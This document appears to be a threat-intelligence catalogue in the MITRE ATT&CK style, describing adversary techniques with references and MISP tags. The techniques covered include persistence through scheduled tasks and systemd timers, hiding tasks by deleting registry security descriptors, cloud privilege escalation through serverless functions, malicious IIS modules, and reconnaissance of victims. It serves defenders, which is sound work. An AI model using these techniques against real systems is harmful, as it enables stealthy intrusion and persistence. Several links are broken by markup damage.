An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.<sup>[[ProofPoint Serpent](https://app.tidalcyber.com/references/c2f7958b-f521-4133-9aeb-c5c8fae23e78)]</sup>

Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://app.tidalcyber.com/technique/f37f0cd5-0446-415f-9309-94e25aa1165d)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from schtasks /query and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).<sup>[[SigmaHQ](https://app.tidalcyber.com/references/27812e3f-9177-42ad-8681-91c65aba4743)]</sup><sup>[[Tarrask scheduled task](https://app.tidalcyber.com/references/87682623-d1dd-4ee8-ae68-b08be5113e3e)]</sup> Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., Index value) within associated registry keys.<sup>[[Defending Against Scheduled Task Attacks in Windows Environments](https://app.tidalcyber.com/references/111d21df-5531-4927-a173-fac9cd7672b3)]</sup>

The tag is: misp-galaxy:technique="Scheduled Task"

Systemd Timers

Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://app.tidalcyber.com/technique/803d286d-8104-4af8-9821-3f49240edc2b) in Linux environments.<sup>[[archlinux Systemd Timers Aug 2020](https://app.tidalcyber.com/references/670f02f1-3927-4f38-aa2b-9ca0d8cf5b8e)]</sup> Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH]([Systemd Remote Control(https://app.tidalcyber.com/references/0461b58e-400e-4e3e-b7c4-eed7a9b0fdd6)]</sup>

Each <code>.timer</code> file must have a corresponding <code>.service</code> file with the same name, e.g., <code>example.timer</code> and <code>example.service</code>. <code>.service</code> files are [Systemd Service](https://app.tidalcyber.com/technique/7aae1ad0-fb1f-484a-a176-c94e4c7ada77) unit files that are managed by the systemd system and service manager.<sup>[[Linux man-pages: systemd January 2014](https://app.tidalcyber.com/references/e9a58efd-8de6-40c9-9638-c642311d6a07)]</sup> Privileged timers are written to <code>/etc/systemd/system/</code> and <code>/usr/lib/systemd/system</code> while user level are written to <code>~/.config/systemd/user/</code>.

An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.<sup>[[Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018](https://app.tidalcyber.com/references/0654dabf-e885-45bf-8a8e-2b512ff4bf46)]</sup><sup>[[gist Arch package compromise 10JUL2018](https://app.tidalcyber.com/references/b2900049-444a-4fe5-af1f-b9cd2cd9491c)]</sup><sup>[[acroread package compromised Arch Linux Mail 8JUL2018](https://app.tidalcyber.com/references/99245022-2130-404d-bf7a-095d84a515cd)]</sup> Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.<sup>[[Falcon Sandbox smp: 28553b3a9d](https://app.tidalcyber.com/references/f27ab4cb-1666-501a-aa96-537d2b2d1f08)]</sup>

The tag is: misp-galaxy:technique="Systemd Timers"

Scheduled Task/Job

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.<sup>[[TechNet Task Scheduler Security](https://app.tidalcyber.com/references/3a6d08ba-d79d-46f7-917d-075a98c59228)]</sup>

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.<sup>[[ProofPoint Serpent](https://app.tidalcyber.com/references/c2f7958b-f521-4133-9aeb-c5c8fae23e78)]</sup>

The tag is: misp-galaxy:technique="Scheduled Task/Job"

Scheduled Transfer

Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.

When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://app.tidalcyber.com/technique/89203cae-d3f1-4eef-9b5a-29042eb05d19) or [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).

The tag is: misp-galaxy:technique="Scheduled Transfer"

Screen Capture

Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.<sup>[[CopyFromScreen .NET](https://app.tidalcyber.com/references/b9733af4-ffb4-416e-884e-d51649aecbce)]</sup><sup>[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]</sup>

The tag is: misp-galaxy:technique="Screen Capture"

Purchase Technical Data

Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.

Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.<sup>[[ZDNET Selling Data](https://app.tidalcyber.com/references/61d00ae2-5494-4c6c-8860-6826e701ade8)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

The tag is: misp-galaxy:technique="Purchase Technical Data"

Threat Intel Vendors

Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.<sup>[[D3Secutrity CTI Feeds](https://app.tidalcyber.com/references/088f2cbd-cce1-477f-9ffb-319477d74b69)]</sup>

Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Threat Intel Vendors"

Search Closed Sources

Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.<sup>[[D3Secutrity CTI Feeds](https://app.tidalcyber.com/references/088f2cbd-cce1-477f-9ffb-319477d74b69)]</sup> Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.<sup>[[ZDNET Selling Data](https://app.tidalcyber.com/references/61d00ae2-5494-4c6c-8860-6826e701ade8)]</sup>

Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

The tag is: misp-galaxy:technique="Search Closed Sources"

CDNs

Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.

Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.<sup>[[DigitalShadows CDN](https://app.tidalcyber.com/references/183a070f-6c8c-46e3-915b-6edc58bb5e91)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)).

The tag is: misp-galaxy:technique="CDNs"

Digital Certificates

Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.

Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.<sup>[[SSLShopper Lookup](https://app.tidalcyber.com/references/a8dc493f-2021-48fa-8f28-afd13756b789)]</sup> Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).<sup>[[Medium SSL Cert](https://app.tidalcyber.com/references/6502425f-3435-4162-8c96-9e10a789d362)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Digital Certificates"

DNS/Passive DNS

Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.

Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).<sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="DNS/Passive DNS"

Scan Databases

Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.<sup>[[Shodan](https://app.tidalcyber.com/references/a142aceb-3ef5-4231-8771-bb3b2dae9acd)]</sup>

Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).

The tag is: misp-galaxy:technique="Scan Databases"

WHOIS

Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup>

Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="WHOIS"

Search Open Technical Databases

Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup><sup>[[Medium SSL Cert](https://app.tidalcyber.com/references/6502425f-3435-4162-8c96-9e10a789d362)]</sup><sup>[[SSLShopper Lookup](https://app.tidalcyber.com/references/a8dc493f-2021-48fa-8f28-afd13756b789)]</sup><sup>[[DigitalShadows CDN](https://app.tidalcyber.com/references/183a070f-6c8c-46e3-915b-6edc58bb5e91)]</sup><sup>[[Shodan](https://app.tidalcyber.com/references/a142aceb-3ef5-4231-8771-bb3b2dae9acd)]</sup>

Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Search Open Technical Databases"

Code Repositories

Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.

Adversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.<sup>[[GitHub Cloud Service Credentials](https://app.tidalcyber.com/references/d2186b8c-10c9-493b-8e25-7d69fce006e4)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).

Note: This is distinct from [Code Repositories](https://app.tidalcyber.com/technique/fe595943-f264-4d05-a8c7-7afc8985bfc3), which focuses on [Collection](https://app.tidalcyber.com/tactics/1ca65327-b553-4923-ae19-8e6987ca250a) from private and internally hosted code repositories.

The tag is: misp-galaxy:technique="Code Repositories"

Search Engines

Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).<sup>[[SecurityTrails Google Hacking](https://app.tidalcyber.com/references/3e7fdeaf-24a7-4cb5-8ed3-6057c9035303)]</sup><sup>[[ExploitDB GoogleHacking](https://app.tidalcyber.com/references/29714b88-a1ff-4684-a3b0-35c3a2c78947)]</sup>

Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).

The tag is: misp-galaxy:technique="Search Engines"

Social Media

Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.

Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service]([Cyware Social Media(https://app.tidalcyber.com/references/e6136a63-81fe-4363-8d98-f7d1e85a0f2b)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).

The tag is: misp-galaxy:technique="Social Media"

Search Open Websites/Domains

Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.<sup>[[Cyware Social Media](https://app.tidalcyber.com/references/e6136a63-81fe-4363-8d98-f7d1e85a0f2b)]</sup><sup>[[SecurityTrails Google Hacking](https://app.tidalcyber.com/references/3e7fdeaf-24a7-4cb5-8ed3-6057c9035303)]</sup><sup>[[ExploitDB GoogleHacking](https://app.tidalcyber.com/references/29714b88-a1ff-4684-a3b0-35c3a2c78947)]</sup>

Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).

The tag is: misp-galaxy:technique="Search Open Websites/Domains"

Search Victim-Owned Websites

Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://app.tidalcyber.com/technique/2eee984c-ea00-4284-b3eb-fd0c603a5a80)). These sites may also have details highlighting business operations and relationships.<sup>[[Comparitech Leak](https://app.tidalcyber.com/references/fa0eac56-45ea-4628-88cf-b843874b4a4d)]</sup>

Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).

The tag is: misp-galaxy:technique="Search Victim-Owned Websites"

Serverless Execution

Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers.

Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking]([Cado Security Denonia(https://app.tidalcyber.com/references/584e7ace-ef33-423b-9801-4728a447cb34)]</sup> Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the IAM:PassRole permission in AWS or the iam.serviceAccounts.actAs permission in Google Cloud to add [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) to a serverless cloud function, which may then be able to perform actions the original user cannot.<sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup><sup>[[Rhingo Security Labs GCP Privilege Escalation](https://app.tidalcyber.com/references/55373476-1cbe-49f5-aecb-69d60b336d38)]</sup>

Serverless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://app.tidalcyber.com/technique/e1e42979-d3cd-461b-afc4-a6373cbf97ba)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.<sup>[[Backdooring an AWS account](https://app.tidalcyber.com/references/2c867527-1584-44f7-b5e5-8ca54ea79619)]</sup> Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.<sup>[[Varonis Power Automate Data Exfiltration](https://app.tidalcyber.com/references/16436468-1daf-433d-bb3b-f842119594b4)]</sup><sup>[[Microsoft DART Case Report 001](https://app.tidalcyber.com/references/bd8c6a86-1a63-49cd-a97f-3d119e4223d4)]</sup>

The tag is: misp-galaxy:technique="Serverless Execution"

IIS Components

Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.<sup>[[Microsoft ISAPI Extension Overview 2017](https://app.tidalcyber.com/references/d00a692f-b990-4757-8acd-56818462ac0c)]</sup><sup>[[Microsoft ISAPI Filter Overview 2017](https://app.tidalcyber.com/references/2fdbf1ba-0480-4d70-9981-3b5967656472)]</sup><sup>[[IIS Backdoor 2011](https://app.tidalcyber.com/references/fd450382-cca0-40c4-8144-cc90a3b0011b)]</sup><sup>[[Trustwave IIS Module 2013](https://app.tidalcyber.com/references/cbb79c3c-1e2c-42ac-8183-9566ccde0cd6)]</sup>

Adversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.<sup>[[Microsoft ISAPI Filter Overview 2017](https://app.tidalcyber.com/references/2fdbf1ba-0480-4d70-9981-3b5967656472)]</sup><sup>[[Microsoft ISAPI Extension Overview 2017](https://app.tidalcyber.com/references/d00a692f-b990-4757-8acd-56818462ac0c)]</sup><sup>[[Microsoft ISAPI Extension All Incoming 2017](https://app.tidalcyber.com/references/7d182eee-eaa8-4b6f-803d-8eb64e338663)]</sup><sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup><sup>[[Trustwave IIS Module 2013](https://app.tidalcyber.com/references/cbb79c3c-1e2c-42ac-8183-9566ccde0cd6)]</sup><sup>[[MMPC ISAPI Filter 2012](https://app.tidalcyber.com/references/ef412bcd-54be-4972-888c-f5a2cdfb8d02)]</sup>

